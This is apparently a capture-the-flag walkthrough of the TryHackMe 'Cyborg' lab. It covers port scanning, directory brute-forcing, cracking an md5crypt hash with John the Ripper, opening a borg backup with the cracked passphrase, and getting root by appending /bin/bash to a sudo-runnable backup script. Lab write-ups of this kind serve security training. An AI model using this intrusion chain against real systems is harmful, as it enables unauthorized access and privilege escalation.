Cyborg

January 04, 2024

Task 1 - Deploy the machine

Deploy the machine
- No answer needed

Task 2 - Compromise the system

Scan the machine, how many ports are open?
- 2
What service is running on port 22?
- ssh
What service is running on port 80?
- http
What is the user.txt flag?
- THM
What is the root.txt flag?
- THM

nmap -sC -sV -oN nmap 10.10.47.92 -Pn -vv

# Nmap 7.93 scan initiated Thu Jan  4 15:16:12 2024 as: nmap -sC -sV -oN nmap -Pn -vv 10.10.43.109
Increasing send delay for 10.10.43.109 from 0 to 5 due to 58 out of 192 dropped probes since last increase.
Nmap scan report for 10.10.43.109
Host is up, received user-set (0.31s latency).
Scanned at 2024-01-04 15:16:12 PST for 44s
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dbb270f307ac32003f81b8d03a89f365 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtLmojJ45opVBHg89gyhjnTTwgEf8lVKKbUfVwmfqYP9gU3fWZD05rB/4p/qSoPbsGWvDUlSTUYMDcxNqaADH/nk58URDIiFMEM6dTiMa0grcKC5u4NRxOCtZGHTrZfiYLQKQkBsbmjbb5qpcuhYo/tzhVXsrr592Uph4iiUx8zhgfYhqgtehMG+UhzQRjnOBQ6GZmI4NyLQtHq7jSeu7ykqS9KEdkgwbBlGnDrC7ke1I9352lBb7jlsL/amXt2uiRrBgsmz2AuF+ylGha97t6JkueMYHih4Pgn4X0WnwrcUOrY7q9bxB1jQx6laHrExPbz+7/Na9huvDkLFkr5Soh
|   256 68e6852f69655be7c6312c8e4167d7ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB5OB3VYSlOPJbOwXHV/je/alwaaJ8qljr3iLnKKGkwC4+PtH7IhMCAC3vim719GDimVEEGdQPbxUF6eH2QZb20=
|   256 562c7992ca23c3914935fadd697ccaab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlr5id6IfMeWb2ZC+LelPmOMm9S8ugHG2TtZ5HpFuZQ
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan  4 15:16:56 2024 -- 1 IP address (1 host up) scanned in 43.88 seconds

gobuster dir -u http://10.10.47.92 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.47.92
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/05 07:45:00 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 310] [--> http://10.10.47.92/admin/]
/etc                  (Status: 301) [Size: 308] [--> http://10.10.47.92/etc/]  
Progress: 1526 / 220561 (0.69%)                                               ^C
[!] Keyboard interrupt detected, terminating.
                                                                               
===============================================================
2024/01/05 07:46:01 Finished
===============================================================

After that we can browse the admin section which we can see there is a file in the archive section which we can download.

mv ~/Downloads/archive.tar .

tar -xvf archive.tar

After download extract the tar file into your directory

After that we can navigate to /etc sub directory in the browser

We can see here we have a MD5 hash that we can crack

We will use john the ripper for hash cracking

cat for-john 
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

john --wordlist=/usr/share/wordlists/rockyou.txt for-john 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2024-01-05 08:44) 8.333g/s 332800p/s 332800c/s 332800C/s jeremy21..pirilampo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

After john crack the md5 hash we now have a passphrase key which is squidward

As we navigate to the admin shoutbox we can see some keywords like "music_archive"

Then we can extract the backup using borg command and use "squidward" for key

borg extract home/field/dev/final_archive::music_archive
Enter passphrase for key /home/kyou/tryhackme-writeups/Cyborg/home/field/dev/final_archive:

After that we can now see we have a new user in the home directory

After that we can sudo -l see if there is any commands that we can run using sudo

Then use this command to view the root.txt

Or we can use this other way

Go to the file folder of that sudo file

Then include write permission to that command

cat backup.sh 
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
	case "${flag}" in 
		c) command=${OPTARG};;
	esac
done



backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

/bin/bash

just add "/bin/bash" at the end and it will move your privilege to root

PreviousRed Team Engagement NextPre Security

Last updated 1 year ago